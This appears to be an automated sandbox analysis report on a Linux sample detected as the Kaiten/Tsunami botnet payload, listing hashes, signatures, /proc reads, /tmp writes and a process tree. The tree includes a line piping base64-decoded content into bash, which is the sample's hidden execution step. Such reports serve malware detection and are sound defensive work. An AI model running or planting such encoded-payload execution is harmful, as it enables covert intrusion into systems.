Analysis
- max time kernel: 82s
- max time network: 68s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20231215-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20231215-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 28-12-2023 18:57
General
- Target: f09c0d5883a221d2e5f762480e946a78
- Size: 42KB
- MD5: f09c0d5883a221d2e5f762480e946a78
- SHA1: 506386147d393cef81019dda55ac85125914c6be
- SHA256: 0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
- SHA512: a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
- SSDEEP: 768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
Processes:
resource: behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp
yara_rule: family_kaiten2
-
Detects Kaiten/Tsunami payload 1 IoCs
Processes:
resource: behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp
yara_rule: family_kaiten
-
Reads runtime system information 59 IoCs
Reads data from /proc virtual filesystem.
Processes:
description | ioc | process
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/1/environ | systemctl
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/filesystems | id
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/sys/kernel/ngroups_max | apt-get
File opened for reading | /proc/filesystems | cp
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/cmdline | systemctl
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | find
File opened for reading | /proc/self/exe | f09c0d5883a221d2e5f762480e946a78
File opened for reading | /proc/filesystems | systemctl
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/filesystems | cp
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | find
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | cp
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | cp
File opened for reading | /proc/self/fd |
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | find
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/self/stat | systemctl
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/1/sched | systemctl
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | dpkg
File opened for reading | /proc/filesystems | find
File opened for reading | /proc/filesystems | sed
File opened for reading | /proc/sys/kernel/osrelease | systemctl
File opened for reading | /proc/filesystems | dpkg
-
Writes file to tmp directory 48 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description | ioc | process
File opened for modification | /tmp/apt.conf.5ygGiO |
File opened for modification | /tmp/apt.sig.XLvKEk |
File opened for modification | /tmp/fileutl.message.xEIziz | apt-get
File opened for modification | /tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg | cp
File opened for modification | /tmp/fileutl.message.4AWCCT | apt-get
File opened for modification | /tmp/apt.sig.21lb0G |
File opened for modification | /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg | touch
File opened for modification | /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg | apt-key
File opened for modification | /tmp/apt.data.ZoiP0Q |
File opened for modification | /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg | apt-key
File opened for modification | /tmp/fileutl.message.qLPbJp | apt-get
File opened for modification | /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg | cp
File opened for modification | /tmp/fileutl.message.4Am35S | apt-get
File opened for modification | /tmp/fileutl.message.JRDOIu | apt-get
File opened for modification | /tmp/fileutl.message.5mnKDj | apt-get
File opened for modification | /tmp/fileutl.message.PwJMWw | apt-get
File opened for modification | /tmp/apt.sig.XyhbkB |
File opened for modification | /tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.sh | apt-key
File opened for modification | /tmp/apt.data.lfc2h1 |
File opened for modification | /tmp/fileutl.message.c0t5Gs | apt-get
File opened for modification | /tmp/fileutl.message.Ry5uh4 | apt-get
File opened for modification | /tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.sh | apt-key
File opened for modification | /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg | touch
File opened for modification | /tmp/fileutl.message.p7Idh2 | apt-get
File opened for modification | /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg | apt-key
File opened for modification | /tmp/fileutl.message.TNKeuh | apt-get
File opened for modification | /tmp/fileutl.message.pMwRl6 | apt-get
File opened for modification | /tmp/fileutl.message.MvPvWl | apt-get
File opened for modification | /tmp/fileutl.message.wADoCX | apt-get
File opened for modification | /tmp/apt.data.BIxS8y |
File opened for modification | /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg | cp
File opened for modification | /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg | cp
File opened for modification | /tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.sh | apt-key
File opened for modification | /tmp/fileutl.message.1fsRhH | apt-get
File opened for modification | /tmp/fileutl.message.VT0HSF | apt-get
File opened for modification | /tmp/fileutl.message.PZb8hV | apt-get
File opened for modification | /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg | apt-key
File opened for modification | /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg | touch
File opened for modification | /tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.sh | apt-key
File opened for modification | /tmp/apt.conf.g1uyWL |
File opened for modification | /tmp/fileutl.message.QwPGB8 | apt-get
File opened for modification | /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg | touch
File opened for modification | /tmp/apt.conf.TaBuRO |
File opened for modification | /tmp/fileutl.message.lwEEZH | apt-get
File opened for modification | /tmp/fileutl.message.WTFVgK | apt-get
File opened for modification | /tmp/apt.conf.g9ukqV |
File opened for modification | /tmp/apt.data.73Fbeh |
File opened for modification | /tmp/apt.sig.BT4hCo |
Processes
- /tmp/f09c0d5883a221d2e5f762480e946a78: /tmp/f09c0d5883a221d2e5f762480e946a78 [1]
  - Reads runtime system information
- /bin/sh: sh -c "echo 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 | base64 -d | bash" [2]
- /usr/bin/base64: base64 -d [3]
- /bin/bash: bash [3]
- /usr/bin/apt-get: apt-get update --fix-missing [4]
  - Reads runtime system information
  - Writes file to tmp directory
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [5]
  - Reads runtime system information
- /usr/lib/apt/methods/http: /usr/lib/apt/methods/http [5]
- /usr/lib/apt/methods/http: /usr/lib/apt/methods/http [5]
- /usr/lib/apt/methods/http: /usr/lib/apt/methods/http [5]
- /usr/lib/apt/methods/gpgv: /usr/lib/apt/methods/gpgv [5]
- /usr/lib/apt/methods/gpgv: /usr/lib/apt/methods/gpgv [5]
- /bin/sh: sh -c "[ ! -e /run/systemd/system ] || [ \$(id -u) -ne 0 ] || systemctl start --no-block apt-news.service esm-cache.service || true" [1]
- /usr/bin/id: id -u [2]
  - Reads runtime system information
- /bin/systemctl: systemctl start --no-block apt-news.service esm-cache.service [2]
  - Reads runtime system information
- /usr/bin/apt-key: /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh [1]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell MASTER_KEYRING APT::Key::MasterKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell REMOVED_KEYS APT::Key::RemovedKeys [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell GPGV Apt::Key::gpgvcommand [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/mktemp: mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX [2]
- /bin/chmod: chmod 700 /tmp/apt-key-gpghome.o5POtCtfqs [2]
- /bin/readlink: readlink -f /tmp/apt-key-gpghome.o5POtCtfqs [2]
- /bin/rm: rm -f /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg [2]
- /usr/bin/touch: touch /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg [2]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/readlink: readlink -f /etc/apt/trusted.gpg.d/ [2]
- /usr/bin/find: find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")" [2]
  - Reads runtime system information
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cp: cp -a /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg /tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg [2]
  - Reads runtime system information
  - Writes file to tmp directory
- /usr/bin/gpgv: gpgv --homedir /tmp/apt-key-gpghome.o5POtCtfqs --keyring /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh [2]
- /usr/bin/gpgconf: gpgconf --kill all [2]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart KILLAGENT [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR [3]
- /bin/rm: rm -rf /tmp/apt-key-gpghome.o5POtCtfqs [2]
- /usr/bin/sort: sort [1]
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /usr/bin/apt-key: /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y [1]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell MASTER_KEYRING APT::Key::MasterKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell REMOVED_KEYS APT::Key::RemovedKeys [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell GPGV Apt::Key::gpgvcommand [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/mktemp: mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX [2]
- /bin/chmod: chmod 700 /tmp/apt-key-gpghome.Dy6P39OCwo [2]
- /bin/readlink: readlink -f /tmp/apt-key-gpghome.Dy6P39OCwo [2]
- /bin/rm: rm -f /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg [2]
- /usr/bin/touch: touch /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg [2]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/readlink: readlink -f /etc/apt/trusted.gpg.d/ [2]
- /usr/bin/find: find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")" [2]
  - Reads runtime system information
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cp: cp -a /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg [2]
  - Reads runtime system information
  - Writes file to tmp directory
- /usr/bin/gpgv: gpgv --homedir /tmp/apt-key-gpghome.Dy6P39OCwo --keyring /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y [2]
- /usr/bin/gpgconf: gpgconf --kill all [2]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart KILLAGENT [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR [3]
- /bin/rm: rm -rf /tmp/apt-key-gpghome.Dy6P39OCwo [2]
- /usr/bin/sort: sort [1]
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /usr/bin/apt-key: /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q [1]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell MASTER_KEYRING APT::Key::MasterKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell REMOVED_KEYS APT::Key::RemovedKeys [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell GPGV Apt::Key::gpgvcommand [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/mktemp: mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX [2]
- /bin/chmod: chmod 700 /tmp/apt-key-gpghome.lP3aH5RXO8 [2]
- /bin/readlink: readlink -f /tmp/apt-key-gpghome.lP3aH5RXO8 [2]
- /bin/rm: rm -f /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg [2]
- /usr/bin/touch: touch /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg [2]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/readlink: readlink -f /etc/apt/trusted.gpg.d/ [2]
- /usr/bin/find: find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")" [2]
  - Reads runtime system information
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cp: cp -a /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg [2]
  - Reads runtime system information
  - Writes file to tmp directory
- /usr/bin/gpgv: gpgv --homedir /tmp/apt-key-gpghome.lP3aH5RXO8 --keyring /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q [2]
- /usr/bin/gpgconf: gpgconf --kill all [2]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart KILLAGENT [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR [3]
- /bin/rm: rm -rf /tmp/apt-key-gpghome.lP3aH5RXO8 [2]
- /usr/bin/sort: sort [1]
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /usr/bin/apt-key: /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h1 [1]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell MASTER_KEYRING APT::Key::MasterKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell REMOVED_KEYS APT::Key::RemovedKeys [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /usr/bin/apt-config: apt-config shell GPGV Apt::Key::gpgvcommand [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/mktemp: mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX [2]
- /bin/chmod: chmod 700 /tmp/apt-key-gpghome.PUWKEmdlgl [2]
- /bin/readlink: readlink -f /tmp/apt-key-gpghome.PUWKEmdlgl [2]
- /bin/rm: rm -f /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg [2]
- /usr/bin/touch: touch /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg [2]
  - Writes file to tmp directory
- /usr/bin/apt-config: apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d [2]
- /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures [3]
  - Reads runtime system information
- /bin/readlink: readlink -f /etc/apt/trusted.gpg.d/ [2]
- /usr/bin/find: find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")" [2]
  - Reads runtime system information
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg [2]
- /usr/bin/cmp: cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cat: cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg [2]
- /bin/cp: cp -a /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg [2]
  - Reads runtime system information
  - Writes file to tmp directory
- /usr/bin/gpgv: gpgv --homedir /tmp/apt-key-gpghome.PUWKEmdlgl --keyring /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h1 [2]
- /usr/bin/gpgconf: gpgconf --kill all [2]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart KILLAGENT [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end [3]
- /usr/bin/gpg-connect-agent: gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR [3]
- /bin/rm: rm -rf /tmp/apt-key-gpghome.PUWKEmdlgl [2]
- /usr/bin/sort: sort [1]
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /bin/sed: sed -e "s#'#'\"'\"'#g" [1]
  - Reads runtime system information
- /bin/sh: sh -c "touch /var/lib/apt/periodic/update-success-stamp 2>/dev/null || true" [1]
- /usr/bin/touch: touch /var/lib/apt/periodic/update-success-stamp [2]
- /bin/sh: sh -c "[ ! -f /var/run/dbus/system_bus_socket ] || /usr/bin/dbus-send --system --dest=org.debian.apt --type=signal /org/debian/apt org.debian.apt.CacheChanged || true" [1]
- /bin/sh: sh -c "/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null" [1]
Network
MITRE ATT&CK Matrix
Downloads
-
memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp